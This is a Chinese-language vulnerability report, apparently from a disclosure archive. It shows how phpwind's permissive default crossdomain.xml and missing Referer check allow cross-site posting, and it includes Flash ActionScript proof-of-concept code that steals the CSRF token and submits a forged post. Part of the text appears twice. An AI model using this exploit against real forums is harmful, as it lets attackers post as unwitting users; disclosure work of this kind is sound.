VULHUB ™

### 简要描述： phpwind配置不当可导致CSRF发帖 ### 详细说明： crossdomain.xml的默认设置： ``` <?xml version="1.0"?> -<cross-domain-policy> <allow-access-from domain="*"/> <!-- flash跨域策略，domain建议设置为 *.你的站点域名 --> </cross-domain-policy> ``` 虽然有建议 但是普通站长谁没事改这个啊，还不如你们在安装时直接根据host重写下crossdomain.xml得了。 先取到csrf的token [<img src="https://images.seebug.org/upload/201309/281417272339bb55dbba12ebfe356dc5c41e1449.png" alt="Q.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/281417272339bb55dbba12ebfe356dc5c41e1449.png) ``` function gethash() { function getformhash(txt) { txt = txt.split('csrf_token" value="')[1].split('"')[0]; return txt; } var result_lv:LoadVars = new LoadVars(); result_lv.onData = function(txt) { if (txt) { txt = getformhash(txt); } else { txt = "Error connecting to server."; } trace(txt); }; var send_lv:LoadVars = new LoadVars(); method = 'GET'; url = "http://localhost:8080/index.php?c=post&fid=2"; send_lv.sendAndLoad(url,result_lv,method); } gethash() ```...

### 简要描述： phpwind配置不当可导致CSRF发帖 ### 详细说明： crossdomain.xml的默认设置： ``` <?xml version="1.0"?> -<cross-domain-policy> <allow-access-from domain="*"/> <!-- flash跨域策略，domain建议设置为 *.你的站点域名 --> </cross-domain-policy> ``` 虽然有建议 但是普通站长谁没事改这个啊，还不如你们在安装时直接根据host重写下crossdomain.xml得了。 先取到csrf的token [<img src="https://images.seebug.org/upload/201309/281417272339bb55dbba12ebfe356dc5c41e1449.png" alt="Q.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/281417272339bb55dbba12ebfe356dc5c41e1449.png) ``` function gethash() { function getformhash(txt) { txt = txt.split('csrf_token" value="')[1].split('"')[0]; return txt; } var result_lv:LoadVars = new LoadVars(); result_lv.onData = function(txt) { if (txt) { txt = getformhash(txt); } else { txt = "Error connecting to server."; } trace(txt); }; var send_lv:LoadVars = new LoadVars(); method = 'GET'; url = "http://localhost:8080/index.php?c=post&fid=2"; send_lv.sendAndLoad(url,result_lv,method); } gethash() ``` 然后csrf发帖 pw这里甚至没有对refer进行检查 可以直接外域提交 [<img src="https://images.seebug.org/upload/201309/2814210375a9d3ec8d9b214e5d677a3827b2caed.png" alt="Q57.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/2814210375a9d3ec8d9b214e5d677a3827b2caed.png) ``` function dopost() { var result_lv:LoadVars = new LoadVars(); result_lv.onData = function(txt) { trace(txt); }; var send_lv:LoadVars = new LoadVars(); method = 'post'; url = "http://localhost:8080/index.php?c=post&a=doadd&_json=1&fid=2"; send_lv['csrf_token'] = '{{ csrf_token }}'; send_lv['atc_title'] = '1380343694'; send_lv['atc_content'] = '12112123123sdf1'; send_lv['pid'] = ''; send_lv['tid'] = ''; send_lv['special'] = 'default'; send_lv.sendAndLoad(url,result_lv,method); } dopost() ``` ### 漏洞证明：